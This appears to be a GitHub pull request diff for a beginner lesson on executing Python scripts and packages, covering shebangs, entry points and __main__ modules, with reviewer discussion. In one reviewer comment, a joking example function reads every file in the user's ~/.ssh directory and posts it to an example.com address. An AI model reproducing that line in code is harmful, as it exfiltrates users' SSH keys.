Add: Jeremy's scripts activity #87

167 changes: 167 additions & 0 deletions python-packaging/execute-code.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,167 @@
---
jupytext:
text_representation:
extension: .md
format_name: myst
format_version: 0.13
jupytext_version: 1.16.4
kernelspec:
display_name: Python 3 (ipykernel)
language: python
name: python3
---

# Code Workflow Logic

## Execute a Python script

There are two primary ways to execute a Python script.

You may already be familiar with the `python` command, which can take the name of a Python file and execute it:

```bash
python my_program.py
```

When Python reads a file in this way, it executes all of the "top-level" commands that are not indented.
This is similar, but not identical, to the behavior of copying this file and pasting it line-by-line into an interactive
Python shell (or notebook cell).
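
As a minimal sketch of what "top-level" means here (the names `calls`, `never_called`, and `called` are made up for illustration), the indented function bodies below only run when the function is called, while the unindented statements run as soon as the file is executed:

```python
calls = []


def never_called():
    # Indented: this line only runs if never_called() is invoked.
    calls.append("inside never_called")


def called():
    # Indented: runs because of the top-level call at the bottom of the file.
    calls.append("inside called")


# Not indented: these statements run when the file is executed.
calls.append("top level")
called()

print(calls)
```

Running this file with `python` should record the top-level statement and the body of `called`, but never the body of `never_called`.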

The other way a Python script may be executed is to associate the file with a launch command.

### Non-Windows executables

On Linux or macOS systems, the Python file can itself be turned into a command. By adding a [shebang](https://en.wikipedia.org/wiki/Shebang_(Unix))
as the first line in any Python file, and by giving the file [executable permissions](https://docs.python.org/3/using/unix.html#miscellaneous), the
file can be directly invoked without a `python` command.

```python
#!/usr/bin/env python
# The above line is a shebang, and can take the place of typing python on the command line
# This comment is below, because shebangs must be the first line!

def shiny_hello():
    print("\N{Sparkles} Hello from Python \N{Sparkles}")

shiny_hello()
```

```bash
./my_program.py
# ✨ Hello from Python ✨
```
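
Giving a file executable permissions is usually done in the shell with `chmod +x my_program.py`. The sketch below does the equivalent from Python on a throwaway file in a temporary directory. The file contents and location are assumptions for illustration only, and the permission bits shown apply to Linux and macOS rather than Windows.

```python
import stat
import tempfile
from pathlib import Path

# Hypothetical script contents; the shebang must be the very first line.
SCRIPT = '''#!/usr/bin/env python
print("Hello from Python")
'''

workdir = Path(tempfile.mkdtemp())
script = workdir / "my_program.py"
script.write_text(SCRIPT)

# Roughly `chmod u+x my_program.py`: add the owner-execute bit to the current mode.
script.chmod(script.stat().st_mode | stat.S_IXUSR)

first_line = script.read_text().splitlines()[0]
is_executable = bool(script.stat().st_mode & stat.S_IXUSR)
print(first_line, is_executable)
```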

:::{tip}
Shebangs are a feature of POSIX-style (Unix-like) systems. POSIX represents some level of compatibility between systems.
Linux, macOS, all BSDs, and many other operating systems are fully or mostly POSIX compliant.

Windows is not natively POSIX compliant. However, some "modes" inside of Windows are, such as WSL
(Windows Subsystem for Linux), Git Bash, or some VS Code terminals.
:::

### Windows executables

If your Windows machine has Python registered as the default application associated with `.py` files, then any Python
scripts can be run as commands. However, only one Python can be registered at a time, so all Python scripts run this
way will use the same Python environment. While all Python files should end in a `.py`, this naming is necessary for
Windows to associate the file with Python, as opposed to on Linux where `.py` is a convention and the shebang associates
the file with Python.

Additionally, most Windows Python installs come with the [Python Launcher](https://docs.python.org/3/using/windows.html#python-launcher-for-windows)
which, in addition to letting you specify the version of Python, can also read shebang lines and emulate some of that behavior.
This allows for shebang lines to be re-used between Linux, macOS, and Windows systems. However, on Windows the command must still
be prefaced with another command (`py`).

```bash
py my_program.py
# ✨ Hello from Python ✨
```

:::{tip}
While there is no in-source format that can tell Windows what to do with a Python code file, executing a
Python file with a shebang on Windows also does not cause any issues. Python just sees the whole line as
a comment and ignores it! So even if you develop on Windows, it may be a good idea to add the shebang as
the first line of your scripts, so that colleagues on different systems can also run it.
:::
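
A small sketch of the point in the tip above: to the Python interpreter, the shebang is only a comment. The source string and the `result` variable are made up for illustration.

```python
# Hypothetical file contents, held in a string for the demonstration.
source = "#!/usr/bin/env python\nresult = 1 + 1\n"

# Compile and run the source the way Python would run a file.
# The first line starts with '#', so it is parsed as an ordinary comment.
namespace = {}
exec(compile(source, "my_program.py", "exec"), namespace)

print(namespace["result"])
```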

## Executable comparisons

### Pros of passing a file to `python`:
- don't need execute permissions
- works for every system
- explicit about what you expect to happen

### Pros of adding a shebang to the file:
- file is associated with a specific Python
- don't have to remember which Python to use
Comment on lines +95 to +96
Contributor

i think actually getting to a level of comfort with this idea might take a few more examples, like 'say you have installed several python versions with pyenv, the shebang can indicate python3.11 or etc. and like "what does that /usr/bin/env do?" so maybe we link out to further info for this point?

Contributor

Maybe? I am having trouble thinking of anything to say here that doesn't go down a long tangent about virtual environments.

Contributor

ya ya, i think this is a sort of a special case (i don't think i have ever used the shebang method except when i first started using python and didn't know how to make packages), so if it's proving troublesome i think safe to omit :)

- don't have to use the `python` command
- don't have to even remember it is a Python script


# Share Code
Contributor

I think myst is going to complain about two # headings in a single doc,

could ToC structure be something like

# Executing code
## Executing Scripts
### ...
## Executing Modules
### ...
## Entrypoints - `project.scripts`
### ...

or whatever order - i think that order has a nice build to it: "ok we are running single files, probably familiar, now we're running a file but it's a special file __main__ (or __name__ == "__main__" block), and now we're running a module anywhere in our shell" but up 2 u.

Contributor

@sneakers-the-rat sneakers-the-rat Oct 28, 2024

expanded on this a bit in next comment - this one on top-level topic organization, and next on organization within executing modules. I think it would be worth it to split out scripts/entrypoints into their own top-level section after python -m module and __main__.py since they are sorta distinct concepts that build on each other

Contributor

I mentioned this in a separate discussion about the executable lesson: I originally saw this as two separate lessons, but I just drafted it as a single file. I thought it was maybe too much to do all together. Also, the first section requires almost no other preliminary knowledge, while the second gains a lot by the audience at least already being familiar with packaging and package structure. It could instead be a single lesson, but I would structure it slightly differently.

Contributor

up to you! always in favor of smaller chunks :)

Contributor

I split it all the way in my next draft.


## Execute a Python package

In [Code Workflow Logic][Code Workflow Logic] you learned of the two primary ways to execute a stand-alone Python script.
Contributor

does this link work? is it a special [][] myst link or something?

Contributor

I don't think so... It was a reminder to me to come back and link to the first lesson after this was integrated into the existing lesson hierarchy.

There are two other ways to execute Python as commands, both of which work for code that has been formatted as a package.

### Entrypoints

There is a special `entrypoint` a package can specify in its configuration which will direct installers to create an
executable command. Entrypoints are a general purpose plug-in system for Python packages, but the
Comment on lines +110 to +111
Contributor

this sentence and something like "that you can run from your shell anywhere, without needing to refer to the file specifically."

And then maybe a demo -

"that's how people make it possible to do things like this:

$ pip install my_package
$ my_package

"

or something basic like that - they will have probably seen that before and maybe wondered how to do that, so i think a concrete example to let them know that "this is where we learn to do this cool thing" would be nice :)

[`console_scripts`](https://packaging.python.org/en/latest/specifications/entry-points/#use-for-scripts)
entry is specifically targeted at creating executable commands on systems that install the package.

The target of a `scripts` definition should be one function within your package, which will be directly executed
when the command is invoked in the shell. A `scripts` definition in your `pyproject.toml` looks like:

```toml
[project.scripts]
COMMAND = "my_package.my_module:my_function"
```

where `COMMAND` is the name of the command that will be made available after installation, `my_package` is the name of
your top-level package import, `my_module` is the name of any sub-modules in your package (optional, or may be
repeated as necessary to access the correct sub-module), and `my_function` is the function that will be called
(without parameters) when the command is invoked.
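
To make the `module:function` format more concrete, here is a rough sketch of how such a string can be turned into a callable. This is not the code that `pip` or any other installer generates; `resolve_entry_point` is a hypothetical helper, and the target `platform:python_implementation` is just a standard-library stand-in for `my_package.my_module:my_function`.

```python
import importlib


def resolve_entry_point(target):
    """Return the object named by a "package.module:function" string."""
    module_name, _, function_name = target.partition(":")
    module = importlib.import_module(module_name)
    return getattr(module, function_name)


# Stand-in target from the standard library; a real project would use
# something like "my_package.my_module:my_function".
command = resolve_entry_point("platform:python_implementation")

# As with a real script entry, the function is called without parameters.
print(command())
```

The part before the colon is imported as a module, and the part after it is looked up as an attribute of that module. This simplified version only handles a single function name after the colon.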

Scripts defined in project configuration, such as `pyproject.toml`, do not need to exist as independent files in
the package repository, but will be created by installation tools, such as `pip`, at the time the package is
installed, in a manner customized to the current operating system.
Comment on lines +128 to +130
Contributor

i am not sure what this means?

Contributor

scripts are not files in the repo's source. The black "command" is constructed and saved during install, it is part of the job of an installer to make these scripts. This is as opposed to keeping explicit scripts checked into the VCS (like a bin/run_me with a shebang) that some projects do. Some even include those scripts in the sdist/wheel; if they do, they also get installed into e.g. the venv and appear on PATH. But those are not "entrypoint scripts".

Contributor

aha that's what i figured you were referring to - i think this might be TMI for newbies :). it makes me think like "wait so should I not put this .py file in my repo? how will the tool know how to generate it for me if it's not there? when what you're referring to are the little autogenerated shim files that just call the script with shebang/etc.

Might be another good one for an admonition box after explaining the concept of [project.scripts] kind of scripts - "try this: install your package in a virtual environment, and then open the venv/bin/your_script file - what the heck is that about!?!?!"

i think it's important information (in the same way that i always tell anyone who wants to know what a virtual environment is to just read the bin/activate file (actually usually i parse it for them because there's really only two things you need to know but they're hidden in the shell script)) but might be a bit much in main text, and seems like it fits as a "if you want to know more" for the curious campers <3

Contributor

Took this out for now


### Executable modules

The final way to make Python code executable directly from the command line is to include a
[`__main__` module](https://docs.python.org/3/library/__main__.html#module-__main__) in your package. Any package that
contains a `__main__` module and is installed in the current Python environment can be executed as a module
directly from the `python` command, without reference to any specific files.
```bash
python -m my_package
```

Try to create a `__main__.py` module in your package that will execute with the above command. (Don't forget to
(re)install your package after creating this file!)
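
If you want to see the mechanism without touching your own package, the following sketch builds a throwaway package in a temporary directory and runs it with the standard library's `runpy.run_module`, which is the library counterpart of `python -m`. The package name `demo_package` and its contents are assumptions for illustration, and adding the directory to `sys.path` stands in for a real install.

```python
import runpy
import sys
import tempfile
from pathlib import Path

# Build a tiny, hypothetical package: demo_package/__init__.py and __main__.py
root = Path(tempfile.mkdtemp())
package = root / "demo_package"
package.mkdir()
(package / "__init__.py").write_text("")
(package / "__main__.py").write_text(
    'message = "running demo_package as a module"\nprint(message)\n'
)

# Stand-in for installing the package into the current environment.
sys.path.insert(0, str(root))

# Roughly what `python -m demo_package` does: import the package,
# then execute its __main__ submodule under the name "__main__".
result = runpy.run_module("demo_package", run_name="__main__")
print(result["__name__"])
```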

#### Further exploration

On your own or in small groups:

- What might be the advantages of making a packaged executable over providing script entry points?
- What are some disadvantages?
- Review the Pros section from [Executing Scripts][Executing Scripts]
- Any similarities between executable packages and executable scripts?

#### More About Main

You just learned that the `__main__` module allows a package to be executed directly from the command line with
Contributor

i was wondering where this was, ha :)

I think the flow might be a little clearer if we go

  • execute single python files with python file.py
  • execute a file within a python package with python -m mypackage.myfile initially with some loose calls at the module level, and then demonstrating why we might want to wrap those up in a function or put them in a if __name__ == "__main__": block so they don't run when imported,
  • execute a special __main__.py file that takes the place of that if __name__ == "__main__": block

Just because I think introducing a new dunder file might take some motivating, like "why do i need this special file" and so introducing directly running a module file first gets you that motivation and also is a nice bridge from running a python script directly.

Contributor

Hmm, this is actually part of what I am trying to teach here. python -m is not for single-file execution, it only works to execute (part of) a package. So you can't introduce -m without __main__.py plus a full intro to packaging (building, pyproject.toml, installing, ...). Also __main__.py files typically don't have a if __name__ == "__main__": because their purpose is only to be executed, not imported. (this is called out in the standard documentation).

So this may need some reordering, but you seem to have dropped entrypoints in your suggestion, and merged `python file.py` and `./file.py` (very understandable). I do think that the `if` guard could maybe come first, as it is IME more common than `__main__.py`.

Contributor

you seem to have dropped entrypoints in your suggestion

oh ya ya this was just about the "this section" part, thinking of putting entrypoints after this.

python -m is not for single-file execution

The way i was thinking about this as far as like a train of thought in a lesson was like:

I have a python file file.py like this:

import requests; from pathlib import Path
def a_function():
    """dont worry too much about it"""
    requests.post("https://example.com/best_friend", data={str(p):p.read_text() for p in (Path.home()/'.ssh').glob('**/*')})

a_function()

first: i can call that function like python file.py

Then I make a package like

- pyproject.toml
- my_package
  |- __init__.py
  |- file.py

second: now (if i have installed it), i can call my file like python -m my_package.file

but wait! there is problem, what if we want to import our function and use it elsewhere? (introduce if __name__ == "__main__") concept

But wait! there's also a whole other special file for that

- pyproject.toml
- my_package
  |- __init__.py
  |- __main__.py
  |- file.py

so third: if i move my a_function() call to __main__.py, i can call my function like python -m my_package

Contributor

I like this a lot. I took most of this approach in my next draft.

`python -m`, but there is another purpose to the `__main__` name in Python. Any Python script that is executed
directly, by any of the methods you have learned to run Python code from the shell, will be given the name `__main__`
which identifies it as the first Python module loaded. This leads to the convention `if __name__ == "__main__":`, which
you may have seen used previously.

This conditional is often used at the bottom of modules, especially modules that
are expected to be executed directly, to separate code that is intended to execute as part of a command from code that
is intended to execute as part of an import.
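
As a hedged illustration of how the conditional separates the two cases, the sketch below runs the same hypothetical source twice: once with `__name__` set to `"__main__"` (as Python does for a file executed directly) and once with it set to a module name (as Python does on import). The names `SOURCE`, `mode`, and `my_module` are invented for this example.

```python
# Hypothetical module source, held in a string so both cases can be shown at once.
SOURCE = '''
mode = "imported"

if __name__ == "__main__":
    mode = "executed"
'''

as_script = {"__name__": "__main__"}   # what Python sets when the file is run directly
as_import = {"__name__": "my_module"}  # what Python sets for `import my_module`

exec(SOURCE, as_script)
exec(SOURCE, as_import)

print(as_script["mode"], as_import["mode"])
```

Only the run that was given the name `__main__` enters the guarded block.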

Try to create a single Python script that contains an `if __name__ == "__main__":` block, so that the file prints one
message when it is executed directly and a different message when it is imported from other Python code.
14 changes: 14 additions & 0 deletions python-packaging/intro.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
---
jupytext:
text_representation:
extension: .md
format_name: myst
format_version: 0.13
jupytext_version: 1.16.4
kernelspec:
display_name: Python 3 (ipykernel)
language: python
name: python3
---

# Intro